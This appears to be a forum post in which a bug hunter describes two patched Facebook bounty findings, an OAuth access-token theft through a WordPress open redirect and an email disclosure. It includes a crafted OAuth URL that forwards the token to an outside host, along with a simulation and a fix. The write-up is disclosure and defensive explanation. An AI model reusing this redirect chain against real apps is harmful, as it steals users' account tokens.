
Facebook Awards 1000$ for 2 minor bugs - raushanrajjj
Over the last two months I started reading about security vulnerabilities, gave facebook.com a try, and found two minor bugs.

BUG #1: STEALING OAUTH ACCESS TOKEN (500$)

Introduction:
--------------
Facebook apps (including Facebook internal apps) whose redirect_url points to WordPress come under this attack. It was because of an open redirection bug on WordPress sites.

Steps:
-------
1. Facebook launched shemeansbusiness.fb.com (client_id=757713104362213). By default the redirect_url was https://staticxx.facebook.com/connect/xd_arbiter.php

2. The app accepts the shemeansbusiness.fb.com domain in redirect_url and also fbshemeansbusiness.wordpress.com

3. So I crafted a new URL:

https://www.facebook.com/dialog/oauth?display=page&response_type=token&fbconnect=1&client_id=757713104362213&redirect_uri=https%3A%2F%2Ffbshemeansbusiness.wordpress.com%2Fremote-login.php%3Faction%3Dlogout%26back=https://google.sttor.com

Here the redirect URL is:

https%3A%2F%2Ffbshemeansbusiness.wordpress.com%2Fremote-login.php%3Faction%3Dlogout%26back=https://google.sttor.com

4. So if any person has pre-authorized this app, or uses it for the first time via the crafted URL, the access token will be redirected to external websites (having the google or wordpress keyword in the domain).

5. Even techcrunch.com has an open redirection and sends the access token to external websites.

BUG #2: EMAIL DISCLOSURE of users who submitted a link on shemeansbusiness.fb.com (500$)

A URL like this was disclosing the user's email:
https://shemeansbusiness.fb.com/fbsmb_submission/lea-rafferty/

Both bugs were patched immediately. Today Facebook awarded me a total of 1000$ for these two bugs.
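The redirect chain behind BUG #1, as an added example that is not part of the original post or of Facebook's code. It models the two ingredients the post describes: an authorization server that accepts any redirect_uri on a registered host, and an open redirect (remote-login.php?action=logout&back=...) on that host. The hosts, the endpoint and google.sttor.com come from the post; the host allowlist, the "/auth/callback" registered URIs, the validator functions and the token value are assumptions made for illustration. The hardened validator beside it shows the exact-match check that stops the crafted redirect_uri at the authorization server.

```python
"""Added example (not code from the original post): why a host-only
redirect_uri check plus an open redirect leaks an implicit-flow token.
Allowlist contents and callback paths are assumptions for illustration."""
from urllib.parse import parse_qs, urlsplit, urlunsplit

# Assumption: the app accepted any redirect_uri on these two hosts (post, step 2).
REGISTERED_HOSTS = {"shemeansbusiness.fb.com", "fbshemeansbusiness.wordpress.com"}

# Hardened form: exact registered redirect URIs (hypothetical paths).
REGISTERED_REDIRECT_URIS = {
    "https://shemeansbusiness.fb.com/auth/callback",
    "https://fbshemeansbusiness.wordpress.com/auth/callback",
}

# The redirect_uri from the post's crafted OAuth URL, URL-decoded.
CRAFTED_REDIRECT_URI = (
    "https://fbshemeansbusiness.wordpress.com/remote-login.php"
    "?action=logout&back=https://google.sttor.com"
)


def vulnerable_redirect_ok(redirect_uri: str) -> bool:
    """Host-only check: any path or query on a registered host passes."""
    parts = urlsplit(redirect_uri)
    return parts.scheme == "https" and parts.hostname in REGISTERED_HOSTS


def strict_redirect_ok(redirect_uri: str) -> bool:
    """Exact-match check: scheme, host, port and path must equal a registered
    URI, and the value may carry no query string or fragment at all."""
    parts = urlsplit(redirect_uri)
    if parts.query or parts.fragment:
        return False
    canonical = urlunsplit(
        (parts.scheme.lower(), parts.netloc.lower(), parts.path, "", "")
    )
    return canonical in REGISTERED_REDIRECT_URIS


def authorization_server_redirect(redirect_uri, token, validator):
    """response_type=token: on success the token goes into the URL fragment."""
    if not validator(redirect_uri):
        return None  # authorization server refuses the redirect_uri
    parts = urlsplit(redirect_uri)
    return urlunsplit(
        (parts.scheme, parts.netloc, parts.path, parts.query, "access_token=" + token)
    )


def wordpress_open_redirect(url):
    """Models remote-login.php?action=logout&back=<url>: a 302 to 'back'.
    Returns the Location value, or None if the URL is not that endpoint."""
    parts = urlsplit(url)
    if parts.path != "/remote-login.php":
        return None
    qs = parse_qs(parts.query)
    if qs.get("action") != ["logout"] or "back" not in qs:
        return None
    return qs["back"][0]


def follow_redirect_preserving_fragment(current_url, location):
    """Browsers apply the fragment of the request URL to a 3xx Location
    that has no fragment of its own (RFC 7231 section 7.1.2)."""
    src, dst = urlsplit(current_url), urlsplit(location)
    if dst.fragment:
        return location
    return urlunsplit((dst.scheme, dst.netloc, dst.path, dst.query, src.fragment))


def token_landing(redirect_uri, token, validator):
    """Run the chain and report (host that receives the token, token), or
    None when the authorization server rejected the redirect_uri."""
    first = authorization_server_redirect(redirect_uri, token, validator)
    if first is None:
        return None
    back = wordpress_open_redirect(first)
    final = first if back is None else follow_redirect_preserving_fragment(first, back)
    parts = urlsplit(final)
    return parts.hostname, parse_qs(parts.fragment).get("access_token", [None])[0]


if __name__ == "__main__":
    print("vulnerable:", token_landing(CRAFTED_REDIRECT_URI, "TOKEN", vulnerable_redirect_ok))
    print("strict:    ", token_landing(CRAFTED_REDIRECT_URI, "TOKEN", strict_redirect_ok))
```

Two things the walk-through makes concrete. First, the token never passes through the WordPress server at all: it sits in the fragment, which the browser keeps across the 302 and delivers to the attacker's page, so server logs on the registered host show nothing. Second, the fix belongs at the authorization server: registering full redirect URIs and comparing them exactly (no host-suffix or keyword matching, no tolerance for extra query parameters) closes the hole even while the open redirect on the partner site still exists.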
======
deluvas
Do you mind sharing the resources you've read about security vulnerabilities?

~~~
raushanrajjj
I only read the past bugs reported to google and facebook, and read in depth
about OAUTH.

1. http://homakov.blogspot.in/2013/02/hacking-facebook-with-oauth2-and-chrome.html

2. http://www.nirgoldshlager.com/2013/02/how-i-hacked-facebook-oauth-to-get-full.html

3. https://medium.com/@atom/a-simple-bug-on-facebook-that-is-worth-8000-b77f7e01b064#.8d4nef1g4

